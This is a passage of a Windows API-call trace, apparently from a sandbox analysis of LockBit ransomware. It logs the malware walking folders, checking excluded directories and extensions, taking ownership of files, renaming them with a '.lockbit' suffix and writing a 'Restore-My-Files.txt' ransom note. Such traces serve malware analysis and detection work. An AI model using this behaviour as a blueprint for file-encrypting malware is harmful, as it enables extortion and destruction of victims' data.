lpFindFileData=0x344cf48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="..", cAlternateFileName="")) returned 1 [0077.258] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0077.258] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0077.258] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6ce8929, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe6f23d9c, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe6f23d9c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0077.258] lstrcmpiW (lpString1=".", lpString2="tipresx.dll.mui") returned -1 [0077.258] lstrcmpiW (lpString1="..", lpString2="tipresx.dll.mui") returned -1 [0077.258] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0077.259] lstrcmpiW (lpString1=".386", lpString2=".mui") returned -1 [0077.259] lstrcmpiW (lpString1=".cmd", lpString2=".mui") returned -1 [0077.259] lstrcmpiW (lpString1=".exe", lpString2=".mui") returned -1 [0077.259] lstrcmpiW (lpString1=".ani", lpString2=".mui") returned -1 [0077.259] lstrcmpiW (lpString1=".adv", lpString2=".mui") returned -1 [0077.259] lstrcmpiW (lpString1=".theme", lpString2=".mui") returned 1 [0077.259] lstrcmpiW (lpString1=".msi", lpString2=".mui") returned -1 [0077.259] lstrcmpiW (lpString1=".msp", lpString2=".mui") returned -1 [0077.259] lstrcmpiW (lpString1=".com", lpString2=".mui") returned -1 [0077.259] lstrcmpiW (lpString1=".diagpkg", lpString2=".mui") returned -1 [0077.259] lstrcmpiW (lpString1=".nls", lpString2=".mui") returned 1 [0077.259] lstrcmpiW (lpString1=".diagcab", lpString2=".mui") returned -1 [0077.259] lstrcmpiW (lpString1=".lock", lpString2=".mui") returned -1 [0077.259] lstrcmpiW (lpString1=".ocx", lpString2=".mui") returned 1 [0077.259] lstrcmpiW (lpString1=".mpa", lpString2=".mui") returned -1 [0077.259] lstrcmpiW (lpString1=".cpl", lpString2=".mui") returned -1 [0077.259] lstrcmpiW (lpString1=".mod", lpString2=".mui") returned -1 [0077.259] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0077.259] lstrcmpiW (lpString1=".icns", lpString2=".mui") returned -1 [0077.259] lstrcmpiW (lpString1=".prf", lpString2=".mui") returned 1 [0077.259] lstrcmpiW (lpString1=".rtp", lpString2=".mui") returned 1 [0077.259] lstrcmpiW (lpString1=".diagcfg", lpString2=".mui") returned -1 [0077.259] lstrcmpiW (lpString1=".msstyles", lpString2=".mui") returned -1 [0077.260] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0077.260] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0077.260] lstrcmpiW (lpString1=".shs", lpString2=".mui") returned 1 [0077.260] lstrcmpiW (lpString1=".drv", lpString2=".mui") returned -1 [0077.260] lstrcmpiW (lpString1=".wpx", lpString2=".mui") returned 1 [0077.260] lstrcmpiW (lpString1=".bat", lpString2=".mui") returned -1 [0077.260] lstrcmpiW (lpString1=".rom", lpString2=".mui") returned 1 [0077.260] lstrcmpiW (lpString1=".msc", lpString2=".mui") returned -1 [0077.260] lstrcmpiW (lpString1=".spl", lpString2=".mui") returned 1 [0077.260] lstrcmpiW (lpString1=".ps1", lpString2=".mui") returned 1 [0077.260] lstrcmpiW (lpString1=".msu", lpString2=".mui") returned -1 [0077.260] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0077.260] lstrcmpiW (lpString1=".key", lpString2=".mui") returned -1 [0077.260] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0077.260] lstrcmpiW (lpString1=".reg", lpString2=".mui") returned 1 [0077.260] lstrcmpiW (lpString1=".dll", lpString2=".mui") returned -1 [0077.260] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0077.260] lstrcmpiW (lpString1=".idx", lpString2=".mui") returned -1 [0077.260] lstrcmpiW (lpString1=".sys", lpString2=".mui") returned 1 [0077.260] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0077.260] lstrcmpiW (lpString1=".ico", lpString2=".mui") returned -1 [0077.260] lstrcmpiW (lpString1=".lnk", lpString2=".mui") returned -1 [0077.261] lstrcmpiW (lpString1=".rdp", lpString2=".mui") returned 1 [0077.261] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0077.261] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="tipresx.dll.mui") returned -1 [0077.261] lstrcmpiW (lpString1="ntldr", lpString2="tipresx.dll.mui") returned -1 [0077.261] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="tipresx.dll.mui") returned -1 [0077.261] lstrcmpiW (lpString1="bootsect.bak", lpString2="tipresx.dll.mui") returned -1 [0077.261] lstrcmpiW (lpString1="autorun.inf", lpString2="tipresx.dll.mui") returned -1 [0077.261] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\") returned="" [0077.261] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned=".mui" [0077.261] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0077.261] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0077.261] lstrcmpiW (lpString1=".7z", lpString2=".mui") returned -1 [0077.261] lstrcmpiW (lpString1=".ckp", lpString2=".mui") returned -1 [0077.261] lstrcmpiW (lpString1=".dacpac", lpString2=".mui") returned -1 [0077.261] lstrcmpiW (lpString1=".db", lpString2=".mui") returned -1 [0077.261] lstrcmpiW (lpString1=".db-shm", lpString2=".mui") returned -1 [0077.261] lstrcmpiW (lpString1=".db-wal", lpString2=".mui") returned -1 [0077.261] lstrcmpiW (lpString1=".db3", lpString2=".mui") returned -1 [0077.261] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0077.261] lstrcmpiW (lpString1=".dbc", lpString2=".mui") returned -1 [0077.261] lstrcmpiW (lpString1=".dbs", lpString2=".mui") returned -1 [0077.261] lstrcmpiW (lpString1=".dbt", lpString2=".mui") returned -1 [0077.262] lstrcmpiW (lpString1=".dbv", lpString2=".mui") returned -1 [0077.262] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0077.262] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0077.262] lstrcmpiW (lpString1=".mrg", lpString2=".mui") returned -1 [0077.262] lstrcmpiW (lpString1=".mwb", lpString2=".mui") returned 1 [0077.262] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0077.262] lstrcmpiW (lpString1=".ndf", lpString2=".mui") returned 1 [0077.262] lstrcmpiW (lpString1=".qry", lpString2=".mui") returned 1 [0077.262] lstrcmpiW (lpString1=".sdb", lpString2=".mui") returned 1 [0077.262] lstrcmpiW (lpString1=".sdf", lpString2=".mui") returned 1 [0077.262] lstrcmpiW (lpString1=".sql", lpString2=".mui") returned 1 [0077.262] lstrcmpiW (lpString1=".sqlite", lpString2=".mui") returned 1 [0077.262] lstrcmpiW (lpString1=".sqlite3", lpString2=".mui") returned 1 [0077.262] lstrcmpiW (lpString1=".sqlitedb", lpString2=".mui") returned 1 [0077.262] lstrcmpiW (lpString1=".tmd", lpString2=".mui") returned 1 [0077.262] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui.lockbit") returned 81 [0077.262] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0077.262] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui.lockbit")) returned 0 [0077.263] GetLastError () returned 0x5 [0077.263] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0077.263] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0077.263] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0077.264] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0077.264] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0077.264] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3bc, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0077.264] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0077.264] NtQueryInformationFile (in: FileHandle=0x3bc, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0077.280] NtClose (Handle=0x3bc) returned 0x0 [0077.280] RtlFreeAnsiString (AnsiString="\\") [0077.280] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3bc) returned 1 [0077.280] malloc (_Size=0x200) returned 0x53fcc0 [0077.280] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0077.280] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0077.280] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0077.281] CloseHandle (hObject=0x3bc) returned 1 [0077.281] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0077.281] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0077.282] free (_Block=0x53fcc0) [0077.285] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0077.285] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui.lockbit")) returned 1 [0077.285] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0077.286] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0077.286] malloc (_Size=0x40068) returned 0x206b860 [0077.286] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=3584) returned 1 [0077.286] ReadFile (in: hFile=0x3bc, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 0x0 [0077.287] GetLastError () returned 0x3e5 [0077.287] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ") returned 1 [0077.287] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\Restore-My-Files.txt") returned 78 [0077.287] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0077.288] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0077.288] malloc (_Size=0x40068) returned 0x20ebb50 [0077.289] WriteFile (in: hFile=0x3b4, lpBuffer=0x2064f58, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20ebb50 | out: lpBuffer=0x2064f58, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20ebb50) returned 0x0 [0077.290] GetLastError () returned 0x3e5 [0077.290] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6ce8929, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe6f23d9c, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe6f23d9c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0077.290] GetLastError () returned 0x12 [0077.290] FindClose (in: hFindFile=0x2e3290 | out: hFindFile=0x2e3290) returned 1 [0077.290] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="da-DK", cAlternateFileName="")) returned 1 [0077.290] lstrcmpiW (lpString1=".", lpString2="da-DK") returned -1 [0077.290] lstrcmpiW (lpString1="..", lpString2="da-DK") returned -1 [0077.290] lstrcmpiW (lpString1="da-DK", lpString2="$windows.~bt") returned 1 [0077.291] lstrcmpiW (lpString1="da-DK", lpString2="intel") returned -1 [0077.291] lstrcmpiW (lpString1="da-DK", lpString2="msocache") returned -1 [0077.291] lstrcmpiW (lpString1="da-DK", lpString2="$recycle.bin") returned 1 [0077.291] lstrcmpiW (lpString1="da-DK", lpString2="$windows.~ws") returned 1 [0077.291] lstrcmpiW (lpString1="da-DK", lpString2="tor browser") returned -1 [0077.291] lstrcmpiW (lpString1="da-DK", lpString2="boot") returned 1 [0077.291] lstrcmpiW (lpString1="da-DK", lpString2="system volume information") returned -1 [0077.291] lstrcmpiW (lpString1="da-DK", lpString2="perflogs") returned -1 [0077.291] lstrcmpiW (lpString1="da-DK", lpString2="google") returned -1 [0077.291] lstrcmpiW (lpString1="da-DK", lpString2="application data") returned 1 [0077.291] lstrcmpiW (lpString1="da-DK", lpString2="windows") returned -1 [0077.291] lstrcmpiW (lpString1="da-DK", lpString2="windows.old") returned -1 [0077.291] lstrcmpiW (lpString1="da-DK", lpString2="appdata") returned 1 [0077.291] lstrcmpiW (lpString1="da-DK", lpString2="Windows nt") returned -1 [0077.291] lstrcmpiW (lpString1="da-DK", lpString2="Msbuild") returned -1 [0077.291] lstrcmpiW (lpString1="da-DK", lpString2="Microsoft") returned -1 [0077.291] lstrcmpiW (lpString1="da-DK", lpString2="All users") returned 1 [0077.291] lstrcmpiW (lpString1="da-DK", lpString2="mozilla") returned -1 [0077.291] wsprintfW (in: param_1=0x344d200, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK") returned 57 [0077.291] wsprintfW (in: param_1=0x344ca60, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\*") returned 59 [0077.291] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\*" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\*"), fInfoLevelId=0x0, lpFindFileData=0x344cf48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x344cf48) returned 0x2e3290 [0077.292] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0077.292] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="..", cAlternateFileName="")) returned 1 [0077.292] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0077.292] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0077.292] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6fbc310, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe71ab4c9, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe71d1626, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0077.292] lstrcmpiW (lpString1=".", lpString2="tipresx.dll.mui") returned -1 [0077.292] lstrcmpiW (lpString1="..", lpString2="tipresx.dll.mui") returned -1 [0077.292] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0077.292] lstrcmpiW (lpString1=".386", lpString2=".mui") returned -1 [0077.292] lstrcmpiW (lpString1=".cmd", lpString2=".mui") returned -1 [0077.292] lstrcmpiW (lpString1=".exe", lpString2=".mui") returned -1 [0077.292] lstrcmpiW (lpString1=".ani", lpString2=".mui") returned -1 [0077.292] lstrcmpiW (lpString1=".adv", lpString2=".mui") returned -1 [0077.292] lstrcmpiW (lpString1=".theme", lpString2=".mui") returned 1 [0077.292] lstrcmpiW (lpString1=".msi", lpString2=".mui") returned -1 [0077.292] lstrcmpiW (lpString1=".msp", lpString2=".mui") returned -1 [0077.293] lstrcmpiW (lpString1=".com", lpString2=".mui") returned -1 [0077.293] lstrcmpiW (lpString1=".diagpkg", lpString2=".mui") returned -1 [0077.293] lstrcmpiW (lpString1=".nls", lpString2=".mui") returned 1 [0077.293] lstrcmpiW (lpString1=".diagcab", lpString2=".mui") returned -1 [0077.293] lstrcmpiW (lpString1=".lock", lpString2=".mui") returned -1 [0077.293] lstrcmpiW (lpString1=".ocx", lpString2=".mui") returned 1 [0077.293] lstrcmpiW (lpString1=".mpa", lpString2=".mui") returned -1 [0077.293] lstrcmpiW (lpString1=".cpl", lpString2=".mui") returned -1 [0077.293] lstrcmpiW (lpString1=".mod", lpString2=".mui") returned -1 [0077.293] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0077.293] lstrcmpiW (lpString1=".icns", lpString2=".mui") returned -1 [0077.293] lstrcmpiW (lpString1=".prf", lpString2=".mui") returned 1 [0077.293] lstrcmpiW (lpString1=".rtp", lpString2=".mui") returned 1 [0077.293] lstrcmpiW (lpString1=".diagcfg", lpString2=".mui") returned -1 [0077.293] lstrcmpiW (lpString1=".msstyles", lpString2=".mui") returned -1 [0077.293] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0077.293] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0077.293] lstrcmpiW (lpString1=".shs", lpString2=".mui") returned 1 [0077.293] lstrcmpiW (lpString1=".drv", lpString2=".mui") returned -1 [0077.293] lstrcmpiW (lpString1=".wpx", lpString2=".mui") returned 1 [0077.293] lstrcmpiW (lpString1=".bat", lpString2=".mui") returned -1 [0077.293] lstrcmpiW (lpString1=".rom", lpString2=".mui") returned 1 [0077.293] lstrcmpiW (lpString1=".msc", lpString2=".mui") returned -1 [0077.293] lstrcmpiW (lpString1=".spl", lpString2=".mui") returned 1 [0077.293] lstrcmpiW (lpString1=".ps1", lpString2=".mui") returned 1 [0077.293] lstrcmpiW (lpString1=".msu", lpString2=".mui") returned -1 [0077.294] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0077.294] lstrcmpiW (lpString1=".key", lpString2=".mui") returned -1 [0077.294] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0077.294] lstrcmpiW (lpString1=".reg", lpString2=".mui") returned 1 [0077.294] lstrcmpiW (lpString1=".dll", lpString2=".mui") returned -1 [0077.294] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0077.294] lstrcmpiW (lpString1=".idx", lpString2=".mui") returned -1 [0077.294] lstrcmpiW (lpString1=".sys", lpString2=".mui") returned 1 [0077.294] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0077.294] lstrcmpiW (lpString1=".ico", lpString2=".mui") returned -1 [0077.294] lstrcmpiW (lpString1=".lnk", lpString2=".mui") returned -1 [0077.294] lstrcmpiW (lpString1=".rdp", lpString2=".mui") returned 1 [0077.294] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0077.294] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="tipresx.dll.mui") returned -1 [0077.294] lstrcmpiW (lpString1="ntldr", lpString2="tipresx.dll.mui") returned -1 [0077.294] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="tipresx.dll.mui") returned -1 [0077.294] lstrcmpiW (lpString1="bootsect.bak", lpString2="tipresx.dll.mui") returned -1 [0077.294] lstrcmpiW (lpString1="autorun.inf", lpString2="tipresx.dll.mui") returned -1 [0077.294] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\") returned="" [0077.294] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned=".mui" [0077.294] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0077.294] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0077.294] lstrcmpiW (lpString1=".7z", lpString2=".mui") returned -1 [0077.294] lstrcmpiW (lpString1=".ckp", lpString2=".mui") returned -1 [0077.294] lstrcmpiW (lpString1=".dacpac", lpString2=".mui") returned -1 [0077.294] lstrcmpiW (lpString1=".db", lpString2=".mui") returned -1 [0077.294] lstrcmpiW (lpString1=".db-shm", lpString2=".mui") returned -1 [0077.295] lstrcmpiW (lpString1=".db-wal", lpString2=".mui") returned -1 [0077.295] lstrcmpiW (lpString1=".db3", lpString2=".mui") returned -1 [0077.295] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0077.295] lstrcmpiW (lpString1=".dbc", lpString2=".mui") returned -1 [0077.295] lstrcmpiW (lpString1=".dbs", lpString2=".mui") returned -1 [0077.295] lstrcmpiW (lpString1=".dbt", lpString2=".mui") returned -1 [0077.295] lstrcmpiW (lpString1=".dbv", lpString2=".mui") returned -1 [0077.295] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0077.295] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0077.295] lstrcmpiW (lpString1=".mrg", lpString2=".mui") returned -1 [0077.295] lstrcmpiW (lpString1=".mwb", lpString2=".mui") returned 1 [0077.295] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0077.295] lstrcmpiW (lpString1=".ndf", lpString2=".mui") returned 1 [0077.295] lstrcmpiW (lpString1=".qry", lpString2=".mui") returned 1 [0077.295] lstrcmpiW (lpString1=".sdb", lpString2=".mui") returned 1 [0077.295] lstrcmpiW (lpString1=".sdf", lpString2=".mui") returned 1 [0077.295] lstrcmpiW (lpString1=".sql", lpString2=".mui") returned 1 [0077.295] lstrcmpiW (lpString1=".sqlite", lpString2=".mui") returned 1 [0077.295] lstrcmpiW (lpString1=".sqlite3", lpString2=".mui") returned 1 [0077.295] lstrcmpiW (lpString1=".sqlitedb", lpString2=".mui") returned 1 [0077.295] lstrcmpiW (lpString1=".tmd", lpString2=".mui") returned 1 [0077.295] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui.lockbit") returned 81 [0077.295] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0077.295] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui.lockbit")) returned 0 [0077.296] GetLastError () returned 0x5 [0077.296] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0077.296] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0077.296] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0077.297] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0077.297] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0077.297] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3c0, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0077.298] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0077.298] NtQueryInformationFile (in: FileHandle=0x3c0, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: 